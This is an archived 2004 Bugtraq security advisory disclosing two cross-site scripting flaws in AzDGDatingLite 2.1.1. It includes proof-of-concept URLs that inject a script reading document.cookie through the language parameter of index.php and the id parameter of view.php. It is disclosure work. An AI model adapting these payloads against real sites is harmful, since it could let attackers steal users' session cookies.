Bugtraq mailing list archives
[waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite]
From: Janek Vind <come2waraxe () yahoo com>
Date: 8 Apr 2004 16:03:09 -0000
{================================================================================} { [waraxe-2004-SA#014] } {================================================================================} { } { [ Cross-Site Scripting aka XSS in AzDGDatingLite ] } { } {================================================================================} Author: Janek Vind "waraxe" Date: 07. April 2004 Location: Estonia, Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=14 Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AzDGDatingLite: Version 2.1.1 (probably older versions are affected too) Writed by: AzDG (support () azdg com) Homepage: http://www.azdg.com Vulnerabilities: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1. Cross-Site Scripting in language variable: http://localhost/azdlite/index.php?l=en"><script>alert(document.cookie);</script> 2. Cross-Site Scripting in view.php: http://localhost/azdlite/view.php?l=&id=00001<script>alert(document.cookie);</script> Greetings: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greets to torufoorum members and to all bugtraq readers in Estonia! Tervitused! Special greets to Stefano from UT Bee Clan! Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe () yahoo com Janek Vind "waraxe" Homepage: http://www.waraxe.us/ ---------------------------------- [ EOF ] ------------------------------------
Current thread:
- [waraxe-2004-SA#014 - Cross-Site Scripting aka XSS in AzDGDatingLite] Janek Vind (Apr 08)